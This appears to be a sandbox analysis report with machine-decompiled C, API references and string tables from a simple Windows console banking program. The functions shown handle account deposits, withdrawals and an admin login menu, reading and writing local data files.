                                                				_t81 = E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t81,  &_v244);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v376);
                                                				_push( &_v28);
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
                                                				E01238140( &_v324,  &_v456);
                                                				E01238140( &_v324, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v324) >> 1), 0xe);
                                                				_push( &_v324);
                                                				E01237229(_t131, _t175, _t176, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				_t193 = _t185 + 0x14 - 8 + 0x1c;
                                                				_t97 = _v5;
                                                				__eflags = _t97 - 0x59;
                                                				if(_t97 == 0x59) {
                                                					L10:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t99 = E01236EF1("TEMP.DAT", "w");
                                                					_t195 = _t193 + 0x10;
                                                					 *0x1252f24 = _t99;
                                                					_v16 = 0;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t168 =  *0x1252f28; // 0x0
                                                						_t104 = E01237021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t196 = _t195 + 0x38;
                                                						__eflags = _t104 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t117 = E01238230( &_v208,  &_v28);
                                                						_t205 = _t196 + 8;
                                                						__eflags = _t117;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("subss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [0x1248210]");
                                                						asm("comiss xmm0, [ebp-0x24]");
                                                						if(__eflags > 0) {
                                                							asm("movss xmm0, [ebp-0x20]");
                                                							asm("addss xmm0, [ebp-0x24]");
                                                							asm("movss [ebp-0x20], xmm0");
                                                							asm("movss xmm0, [0x1248210]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t173 =  *0x1252f24; // 0x0
                                                						_push(_t173);
                                                						E01236F06(_t131, _t175, _t176, __eflags);
                                                						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t105 =  *0x1252f24; // 0x0
                                                					_push(_t105);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					_t147 =  *0x1252f28; // 0x0
                                                					_push(_t147);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Withdrawn");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t110 =  *0x1252f28; // 0x0
                                                					_push(_t110);
                                                					E01236F06(_t131, _t175, _t176, __eflags);
                                                					_t148 =  *0x1252f28; // 0x0
                                                					_push(_t148);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					E012320E0(_t148, _t175, _t176, __eflags, _t215);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t131, _t175, _t176, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L10;
                                                				}
                                                				return _t97;
                                                			}

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234A03
                                                • _wscanf.LIBCMT ref: 01234A14
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 01234A4C
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 01234A6E
                                                • _wprintf.LIBCMT ref: 01234A84
                                                • _wscanf.LIBCMT ref: 01234A95
                                                • _swscanf.LIBCMT ref: 01234B02
                                                • _wprintf.LIBCMT ref: 01234B51
                                                • _wprintf.LIBCMT ref: 01234B67
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • Transaction NOT completed!, xrefs: 01234B62
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234AF7
                                                • Withdraw from A/C number : , xrefs: 012349FE
                                                • ACCOUNT.DAT, xrefs: 01234C87
                                                • %s %s %s %s %.2f %s, xrefs: 01234E47
                                                • Transaction completed successfully!, xrefs: 01234E77
                                                • [ %s ], xrefs: 01234A69
                                                • Given A/C number does not exits!, xrefs: 01234A47
                                                • TRANSACTION.DAT, xrefs: 01234E03
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 01234C5F
                                                • Confirm Transaction, xrefs: 01234B9C
                                                • Sorry, the current balance is Rs. %.2f only!, xrefs: 01234B4C
                                                • %s to be Withdrawn from A/C number : %s [%s], xrefs: 01234BD7
                                                • Cash+Withdrawn, xrefs: 01234E3E
                                                • Amount to be Withdrawn (in NRs.) : , xrefs: 01234A7F
                                                • ACCOUNT.DAT, xrefs: 01234AA2
                                                • ACCOUNT.DAT, xrefs: 01234A21
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234CF3
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234DC8
                                                • TEMP.DAT, xrefs: 01234C9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                                • API String ID: 427838879-2716176803
                                                • Opcode ID: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction ID: 6f04040dea22da68e6e4612a78f6d78f5b95c4a31de6082b418889cb45a8feed
                                                • Opcode Fuzzy Hash: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction Fuzzy Hash: 5EC1B8F2D3020AABDB11EBE5DC81EEEB778AFA9700F044259F50576080F67066488FB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E012322F0(void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				char _v6;
                                                				signed int _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v60;
                                                				char _v92;
                                                				void* __ebp;
                                                				void* _t50;
                                                				void* _t74;
                                                				void* _t78;
                                                				void* _t85;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                				void* _t100;
                                                				void* _t101;
                                                				void* _t106;
                                                				void* _t116;
                                                
                                                				_t116 = __fp0;
                                                				_t95 = __esi;
                                                				_t94 = __edi;
                                                				_v60 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				do {
                                                					_v20 = 0;
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E01231380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E0123738B("%s",  &_v92);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					_t100 = _t96 + 0x14;
                                                					E012312F0(_t94, _t95,  &_v60);
                                                					_v16 = _v16 + 1;
                                                					_t110 = _v16 - 3;
                                                					if(_v16 == 3) {
                                                						E012320E0( &_v92, _t94, _t95, _t110, _t116);
                                                						E012312B0(0x19, 8);
                                                						_push(0x124f224);
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						E012312B0(0x16, 0xb);
                                                						_push("Press any key to exit the program...");
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						_t100 = _t100 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_t87 =  &_v92;
                                                					_t50 = E01238230( &_v92, "ADMIN");
                                                					_t101 = _t100 + 8;
                                                					if(_t50 != 0) {
                                                						L6:
                                                						E012320E0(_t87, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124f278);
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t101 + 4;
                                                					} else {
                                                						_t78 = E01238230( &_v60, "IOE");
                                                						_t101 = _t101 + 8;
                                                						if(_t78 != 0) {
                                                							goto L6;
                                                						} else {
                                                							_v20 = 1;
                                                						}
                                                					}
                                                					_t113 = _v20 - 1;
                                                				} while (_v20 != 1);
                                                				do {
                                                					E012320E0(_t87, _t94, _t95, _t113, _t116);
                                                					E012312B0(0x1e, 8);
                                                					_push("1. Add User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xa);
                                                					_push("2. Delete User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xc);
                                                					_push("3. Edit User name / Password");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xe);
                                                					_push("4. View User Log");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0x10);
                                                					_push("5. Exit");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					_t106 = _t96 + 0x14;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						_t114 = _v24 - 0x4e;
                                                						if(_v24 >= 0x4e) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t85, _t94, _t95, _t114);
                                                						_t106 = _t106 + 4;
                                                						_v24 = _v24 + 1;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push(" Press a number between the range [1 -5]  ");
                                                					E0123715C(_t85, _t94, _t95, __eflags);
                                                					_t96 = _t106 + 4;
                                                					_t89 = _v6 - 0x30;
                                                					_v28 = _v6 - 0x30;
                                                					_v12 = _v28;
                                                					_v12 = _v12 - 1;
                                                					__eflags = _v12 - 4;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t89, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 5!");
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press ENTER to return to main menu...");
                                                						_t74 = E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t96 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v12 * 4 +  &M012325A8))) {
                                                							case 0:
                                                								_t74 = E012325C0(_t85, _t94, _t95, _t116);
                                                								goto L23;
                                                							case 1:
                                                								E01232800(__ebx, __ecx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 2:
                                                								E01232B10(__ebx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 3:
                                                								E01232E80(__ebx, __edx, __eflags, __fp0);
                                                								goto L23;
                                                							case 4:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                								E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(_v5 == 0x59) {
                                                									L20:
                                                									E012377B1(0);
                                                								} else {
                                                									__eflags = _v5 - 0x79;
                                                									if(_v5 == 0x79) {
                                                										goto L20;
                                                									}
                                                								}
                                                								goto L23;
                                                						}
                                                					}
                                                					L23:
                                                					_t87 = 1;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return _t74;
                                                			}


                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232337
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 0123235A
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123236B
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232381
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012323B4
                                                • _wprintf.LIBCMT ref: 0123241F
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 0123262D
                                                  • Part of subcall function 012325C0: _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 012325C0: _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012323CA
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                • _wprintf.LIBCMT ref: 01232444
                                                • _wprintf.LIBCMT ref: 0123245A
                                                • _wprintf.LIBCMT ref: 01232470
                                                • _wprintf.LIBCMT ref: 01232486
                                                • _wprintf.LIBCMT ref: 0123249C
                                                • _wprintf.LIBCMT ref: 012324CA
                                                • _wprintf.LIBCMT ref: 012324E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                • Enter User name : , xrefs: 01232355
                                                • 5. Exit, xrefs: 01232497
                                                • Press a number between the range [1 -5] , xrefs: 012324DD
                                                • 3. Edit User name / Password, xrefs: 0123246B
                                                • Are you sure you want to exit? <Y/N> : , xrefs: 0123253D
                                                • 4. View User Log, xrefs: 01232481
                                                • Password : , xrefs: 0123237C
                                                • IOE, xrefs: 012323EE
                                                • Press ENTER to return to main menu..., xrefs: 01232589
                                                • 1. Add User, xrefs: 0123243F
                                                • 2. Delete User, xrefs: 01232455
                                                • N, xrefs: 012324BF
                                                • ADMIN, xrefs: 012323D9
                                                • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 01232573
                                                • Only THREE attempts shall be allowed to enter username and password., xrefs: 01232332
                                                • Press any key to exit the program..., xrefs: 012323C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                                • API String ID: 3691436685-2046970424
                                                • Opcode ID: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction ID: 335ee4b4e6891386224e9030417996e0f76fe1bac988ca1193f5b19f2aa8cef2
                                                • Opcode Fuzzy Hash: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction Fuzzy Hash: EA6164F1EB4307A6EB19BBF49D03BBE76715FE1B10F004124EA05792C0E9F162588667
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01234640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v280;
                                                				char _v360;
                                                				char _v440;
                                                				void* __ebp;
                                                				void* _t57;
                                                				char _t73;
                                                				intOrPtr _t75;
                                                				void* _t80;
                                                				intOrPtr _t81;
                                                				intOrPtr _t86;
                                                				void* _t93;
                                                				intOrPtr _t103;
                                                				intOrPtr _t113;
                                                				intOrPtr _t114;
                                                				intOrPtr _t129;
                                                				intOrPtr _t134;
                                                				void* _t137;
                                                				void* _t141;
                                                				void* _t151;
                                                				void* _t153;
                                                				void* _t154;
                                                				void* _t163;
                                                
                                                				_t170 = __fp0;
                                                				_t168 = __eflags;
                                                				_t136 = __esi;
                                                				_t135 = __edi;
                                                				_t101 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Deposit to A/C number            : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t103 =  *0x1252f28; // 0x0
                                                				_push(_t103);
                                                				E01236DB6(__ebx, _t135, _t136, _t168);
                                                				_t141 = _t137 + 0x18;
                                                				_t169 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t103, _t135, _t136, _t169, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(_t101, _t135, _t136, _t169);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v244);
                                                				_push("[ %s ]");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Deposited (in NRs.) : ");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				E012320E0(_t103, _t135, _t136, __eflags, __fp0);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t57 = E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t57,  &_v280);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v244);
                                                				_push( &_v28);
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
                                                				E01238140( &_v360,  &_v440);
                                                				E01238140( &_v360, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v360) >> 1), 0xe);
                                                				_push( &_v360);
                                                				E01237229(_t101, _t135, _t136, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				_t151 = _t141 + 0x24 - 8 + 0x1c;
                                                				_t73 = _v5;
                                                				__eflags = _t73 - 0x59;
                                                				if(_t73 == 0x59) {
                                                					L4:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t75 = E01236EF1("TEMP.DAT", "a");
                                                					_t153 = _t151 + 0x10;
                                                					 *0x1252f24 = _t75;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t129 =  *0x1252f28; // 0x0
                                                						_t80 = E01237021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t154 = _t153 + 0x38;
                                                						__eflags = _t80 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t93 = E01238230( &_v208,  &_v28);
                                                						_t163 = _t154 + 8;
                                                						__eflags = _t93;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("addss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t134 =  *0x1252f24; // 0x0
                                                						_push(_t134);
                                                						E01236F06(_t101, _t135, _t136, __eflags);
                                                						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t81 =  *0x1252f24; // 0x0
                                                					_push(_t81);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					_t113 =  *0x1252f28; // 0x0
                                                					_push(_t113);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Deposited");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t86 =  *0x1252f28; // 0x0
                                                					_push(_t86);
                                                					E01236F06(_t101, _t135, _t136, __eflags);
                                                					_t114 =  *0x1252f28; // 0x0
                                                					_push(_t114);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					E012320E0(_t114, _t135, _t136, __eflags, _t170);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t101, _t135, _t136, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L4;
                                                				}
                                                				return _t73;
                                                			}











































                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234663
                                                • _wscanf.LIBCMT ref: 01234674
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 012346BB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012346DD
                                                • _wprintf.LIBCMT ref: 012346F3
                                                • _wscanf.LIBCMT ref: 01234704
                                                • _wprintf.LIBCMT ref: 0123471F
                                                • _wprintf.LIBCMT ref: 0123475A
                                                • _wprintf.LIBCMT ref: 012347E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • %s to be deposited in A/C number : %s [ %s ], xrefs: 01234755
                                                • Cash+Deposited, xrefs: 0123498B
                                                • Deposit to A/C number : , xrefs: 0123465E
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012347DD
